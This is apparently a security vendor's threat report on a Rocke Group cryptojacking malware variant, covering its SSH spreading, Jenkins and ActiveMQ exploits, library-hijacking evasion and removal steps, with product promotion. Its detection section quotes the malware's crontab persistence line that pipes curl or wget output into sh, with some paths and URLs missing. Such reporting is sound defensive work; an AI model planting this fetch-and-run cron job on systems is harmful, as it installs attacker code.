New Malware Variant Exploits Production Environment
Rocke Group is a Chinese-based threat actor most known for running cryptojacking malware on Linux machines. The group has been active since 2018 and continues to evolve by modifying its tools and techniques to stay evasive. In 2019, we reported that Rocke Group was competing with Pacha Group for cryptomining positioning on Linux-based servers in the cloud.
We have found a new malware variant developed by Rocke Group, that infects other machines in the network using saved SSH keys and weak passwords. It also exploits vulnerabilities in popular platforms and services such as Jenkins, Redis and ActiveMQ. Once the victim is infected a Monero cryptominer is executed.
Below we present our findings with instructions on how to check if your system has been compromised, as well as how to protect your cloud environments against future Rocke Group attacks.
Capabilities and Findings
The malware that is initially delivered to the victim’s server is packed with a modified UPX which can make it harder for some Endpoint Detection and Response (EDR) products to detect the malicious code. This threat contains a number of modules that are stored in a compressed form inside the malware, and during the execution the payloads are extracted and executed.
Rocke Group uses a new script that downloads malware from a hosting server and executes it. The malware then uses public SSH keys, which are saved in a file called “known_hosts” on the victim’s Linux machine, to infect other machines on the network.
The malware archives persistence using a scheduled task in crontab and bashrc files. It creates a service that controls the execution of the malware and configures it to be executed on startup. The payload of the service is extracted from within the Rocke Group sample.
Next, the malware attempts to spread in the network by brute forcing SSH, Redis and Jenkins with weak passwords. Then, it exploits vulnerabilities. For Jenkins it uses two vulnerabilities for executing code (CVE-2018-1000861, CVE-2019-1003000) and for ActiveMQ it tries to do an arbitrary file writing (CVE-2016-3088).
To hide the activity of the malware, it implements an evasion technique that uses library hijacking. This way the information retrieved by system commands is altered in a way that hides resources used by the malware and its components. For instance, running the ‘top’ command will not show the high CPU usage caused by the cryptomining malware.
One of the compressed modules is an XMRig Miner. Before the miner is executed the dropper kills any other process that uses more than 30% of the cloud server’s CPU, this way the cryptominer will have all of the CPU for itself.
Detection and Response
Detect if a machine in your system has been compromised by following all of these steps:
- The malware creates files in the following directories:
Response: Remove the malicious files
MITRE Technique: Masquerading (T1036)
systemctl stop [servicename]
systemctl disable [servicename]
systemctl daemon-reload systemctl reset-failed
*/15 * * * * (curl -fsSL -m180 ||wget -q -T180 -O- )|sh Check the following location of scheduled jobs:
MITRE Technique: Scheduled Task/Job (T1053)
MITRE Technique: Event Triggered Execution using .bashrc file (T1546)
TTPs now available in Intezer Analyze. Speed up malware analysis with relevant insights to understand how malware behaves. Analyze and classify 50 files per month with our free community edition.
- Use strong passwords for SSH, Jenkins and Redis services. It is also highly recommended to use TLS authentication.
- Use different passwords and authentication keys for each machine in the network.
- Make sure that your Jenkins and ActiveMQ services have the latest updates.
- Restrict access to services and machines, and give only the required permissions for each user.
- Filter network traffic to untrusted or known bad domains.
- Apply detection of anomalies in the networks to detect suspicious communication that digresses from the usual traffic.
Runtime Protection is a Must
This attack is sophisticated in that it implements evasion techniques making detection much harder. It also spreads to other services and machines on the network making it harder to respond to. Runtime protection with Intezer Protect gives you immediate visibility over all code running in your systems and alerts you whenever unauthorized code is executed. So, if Rocke Group attacks an environment with Intezer Protect installed on it, the user would immediately get an alert on all infected machines with the ability to terminate the malicious processes.
While there are dozens of cloud attack vectors that threat actors can utilize, such as software vulnerabilities and misconfigurations, eventually all attackers must run code or commands in the production environment to conduct any damage.
Consider that it’s not realistic to be able to close all attack vectors. Not only does it take time to fix vulnerabilities, but there are always attack vectors that are practically impossible to prevent such as supply chain or unknown vulnerabilities. Recent attacks have shown that Linux cryptominers and other threats will find their way into the production environment no matter how hard you work to reduce the attack surface. Runtime protection is a necessary last line of defense as actors like Rocke Group remain active.
How Can Intezer Help?
You will be notified as soon as malicious or unauthorized code is executed. In this case, execution of the script and the malware will trigger an alert. You can see the full process tree, know exactly which malicious processes were created by the malware, and be able to stop them. While the Rocke Group campaign uses advanced evasion techniques to hide the malware and its resources, with Intezer Protect you will see all of the information and activity that happens on your machine.
The way we detect threats is different from other solutions. Anomaly detection and behavioral profiling can fail to detect advanced attacks designed to look “normal.” We detect threat variants by recognizing even the slightest amount of malicious code reuse. This innovation has proven to be the fastest to identify attacks in Linux and containerized environments.
Most runtime solutions are based on behavioral profiling which generates high false positives and requires constant tweaking of rules and policies. Our core detection strategy is based on detecting unauthorized code instead of a set of rules. The result is very few false positives, and contextualized alerts indicating only real attacks.
We inspect any new code running in memory and analyze it against our cyber immune system of trusted and malicious code. This allows us to inspect every change in memory to see if it’s truly unrecognized or malicious code, or just a natural change such as a software upgrade. This analysis does not just give you a “good or bad” answer. It also provides a deep understanding about the threat, where it came from, and who is responsible, crucial for responding smarter and faster to incidents.
Try Intezer Protect for free on up to 10 hosts.
Domains Used to Download the Malware
Domains Used for Resolving the C2 Address